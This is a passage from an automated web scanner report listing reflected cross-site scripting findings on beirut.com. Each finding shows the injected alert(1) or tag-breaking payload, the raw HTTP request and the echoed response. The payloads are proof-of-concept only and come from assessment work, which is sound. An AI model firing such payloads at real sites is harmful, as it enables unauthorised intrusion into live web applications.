<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Online-Internet/Politics-Media-and-News3016d'-alert(1)-'e2875733136';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.643. http://www.beirut.com/Online-Internet/Real-Estate/5645685094 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Online-Internet/Real-Estate/5645685094

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93751"><a>171bd462df7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Online-Internet93751"><a>171bd462df7/Real-Estate/5645685094 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:21:35 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Online-Internet93751"><a>171bd462df7">
...[SNIP]...

4.644. http://www.beirut.com/Online-Internet/Real-Estate/5645685094 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Real-Estate/5645685094

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b8d8'-alert(1)-'4f6b8ce44b4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Online-Internet5b8d8'-alert(1)-'4f6b8ce44b4/Real-Estate/5645685094 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:27:06 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60133

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Online-Internet5b8d8'-alert(1)-'4f6b8ce44b4/Real-Estate';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.645. http://www.beirut.com/Online-Internet/Real-Estate/5645685094 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Real-Estate/5645685094

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db898'-alert(1)-'42b9dfced57 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Online-Internet/Real-Estatedb898'-alert(1)-'42b9dfced57/5645685094 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:32:44 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57561

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Online-Internet/Real-Estatedb898'-alert(1)-'42b9dfced57';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.646. http://www.beirut.com/Online-Internet/Recreation/182769021 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Online-Internet/Recreation/182769021

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c65f"><a>29fc62eb03 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Online-Internet7c65f"><a>29fc62eb03/Recreation/182769021 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:36:24 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Online-Internet7c65f"><a>29fc62eb03">
...[SNIP]...

4.647. http://www.beirut.com/Online-Internet/Recreation/182769021 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Recreation/182769021

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8e56'-alert(1)-'d9e4b68e571 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Online-Internetb8e56'-alert(1)-'d9e4b68e571/Recreation/182769021 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:42:37 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Online-Internetb8e56'-alert(1)-'d9e4b68e571/Recreation';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.648. http://www.beirut.com/Online-Internet/Recreation/182769021 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Recreation/182769021

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3bec0'-alert(1)-'b5798d3d725 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Online-Internet/Recreation3bec0'-alert(1)-'b5798d3d725/182769021 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:47:51 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52956

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Online-Internet/Recreation3bec0'-alert(1)-'b5798d3d725';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.649. http://www.beirut.com/Online-Internet/Social-and-Activist/3727967600 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Online-Internet/Social-and-Activist/3727967600

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 466d8"><a>19ca3df0849 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Online-Internet466d8"><a>19ca3df0849/Social-and-Activist/3727967600 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:36:40 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Online-Internet466d8"><a>19ca3df0849">
...[SNIP]...

4.650. http://www.beirut.com/Online-Internet/Social-and-Activist/3727967600 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Social-and-Activist/3727967600

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b908'-alert(1)-'d197f1277bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Online-Internet7b908'-alert(1)-'d197f1277bf/Social-and-Activist/3727967600 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:45:57 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60312

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Online-Internet7b908'-alert(1)-'d197f1277bf/Social-and-Activist';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.651. http://www.beirut.com/Online-Internet/Social-and-Activist/3727967600 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Social-and-Activist/3727967600

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 779ba'-alert(1)-'0772e8c976f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Online-Internet/Social-and-Activist779ba'-alert(1)-'0772e8c976f/3727967600 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:50:28 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Online-Internet/Social-and-Activist779ba'-alert(1)-'0772e8c976f';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.652. http://www.beirut.com/Online-Internet/Technology/8023704728 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Online-Internet/Technology/8023704728

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5725"><a>58eaad564f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Online-Internetf5725"><a>58eaad564f9/Technology/8023704728 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:31:31 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Online-Internetf5725"><a>58eaad564f9">
...[SNIP]...

4.653. http://www.beirut.com/Online-Internet/Technology/8023704728 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Technology/8023704728

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ddaa6'-alert(1)-'a1bc90a0b93 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Online-Internetddaa6'-alert(1)-'a1bc90a0b93/Technology/8023704728 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:36:37 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Online-Internetddaa6'-alert(1)-'a1bc90a0b93/Technology';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.654. http://www.beirut.com/Online-Internet/Technology/8023704728 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Technology/8023704728

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58d1b'-alert(1)-'1ecd780bcc8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Online-Internet/Technology58d1b'-alert(1)-'1ecd780bcc8/8023704728 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:40:58 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57833

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Online-Internet/Technology58d1b'-alert(1)-'1ecd780bcc8';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.655. http://www.beirut.com/Online-Internet/Tourism-and-Guides/0054751592 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Online-Internet/Tourism-and-Guides/0054751592

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9052e"><a>75c99e9fd70 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Online-Internet9052e"><a>75c99e9fd70/Tourism-and-Guides/0054751592 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:30:47 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Online-Internet9052e"><a>75c99e9fd70">
...[SNIP]...

4.656. http://www.beirut.com/Online-Internet/Tourism-and-Guides/0054751592 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Tourism-and-Guides/0054751592

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88c91'-alert(1)-'3a787f3de24 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Online-Internet88c91'-alert(1)-'3a787f3de24/Tourism-and-Guides/0054751592 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
